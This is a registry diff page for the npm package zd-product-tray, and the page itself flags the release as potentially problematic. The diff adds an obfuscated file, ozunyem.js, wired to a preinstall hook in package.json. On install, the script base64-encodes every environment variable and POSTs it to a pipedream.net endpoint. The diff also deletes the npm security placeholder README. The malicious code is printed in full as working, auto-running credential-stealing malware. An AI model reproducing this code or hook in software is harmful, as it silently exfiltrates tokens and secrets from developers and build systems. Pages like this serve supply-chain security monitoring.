zd-product-tray 0.0.1-security → 5.856.459
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zd-product-tray might be problematic. Click here for more details.
- package/ozunyem.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/ozunyem.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x5eac(){const _0x3f2c6d=['from','3091496WmiyAs','667611fELelp','https','7vrpfRk','join','16jgffVa','net','POST','npm_package_name','stringify','toString','15752DTMEty','4aaa0dfa016c3686a57e93787657fa37','6200gqprOd','request','141681xdnQvm','env','3976008qflIQM','2140KoSVsd','40tlZqOW','743895MfXHRL','pipedream'];a0_0x5eac=function(){return _0x3f2c6d;};return a0_0x5eac();}const a0_0x1988e2=a0_0x5e59;function a0_0x5e59(_0x5331ae,_0xcb5955){const _0x5eac27=a0_0x5eac();return a0_0x5e59=function(_0x5e59ab,_0xa23d1c){_0x5e59ab=_0x5e59ab-0x1a6;let _0x1b86db=_0x5eac27[_0x5e59ab];return _0x1b86db;},a0_0x5e59(_0x5331ae,_0xcb5955);}(function(_0x39ae07,_0x297b2b){const _0x53920a=a0_0x5e59,_0x53b2f9=_0x39ae07();while(!![]){try{const _0x50ca70=parseInt(_0x53920a(0x1a6))/0x1+-parseInt(_0x53920a(0x1aa))/0x2*(parseInt(_0x53920a(0x1b4))/0x3)+parseInt(_0x53920a(0x1b7))/0x4*(-parseInt(_0x53920a(0x1b2))/0x5)+parseInt(_0x53920a(0x1b6))/0x6+-parseInt(_0x53920a(0x1a8))/0x7*(-parseInt(_0x53920a(0x1bc))/0x8)+-parseInt(_0x53920a(0x1b9))/0x9*(parseInt(_0x53920a(0x1b8))/0xa)+parseInt(_0x53920a(0x1b0))/0xb;if(_0x50ca70===_0x297b2b)break;else _0x53b2f9['push'](_0x53b2f9['shift']());}catch(_0x2bdcfd){_0x53b2f9['push'](_0x53b2f9['shift']());}}}(a0_0x5eac,0x548c8));const http=require(a0_0x1988e2(0x1a7));req=http[a0_0x1988e2(0x1b3)]({'host':[a0_0x1988e2(0x1b1),'m',a0_0x1988e2(0x1ba),a0_0x1988e2(0x1ab)][a0_0x1988e2(0x1a9)]('.'),'path':'/'+(process[a0_0x1988e2(0x1b5)][a0_0x1988e2(0x1ad)]||''),'method':a0_0x1988e2(0x1ac)}),req['write'](Buffer[a0_0x1988e2(0x1bb)](JSON[a0_0x1988e2(0x1ae)](process[a0_0x1988e2(0x1b5)]))[a0_0x1988e2(0x1af)]('base64')),req['end']();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zd-product-tray",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "5.856.459",
|
|
4
|
+
"main": "ozunyem.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node ozunyem.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zd-product-tray for more information.
|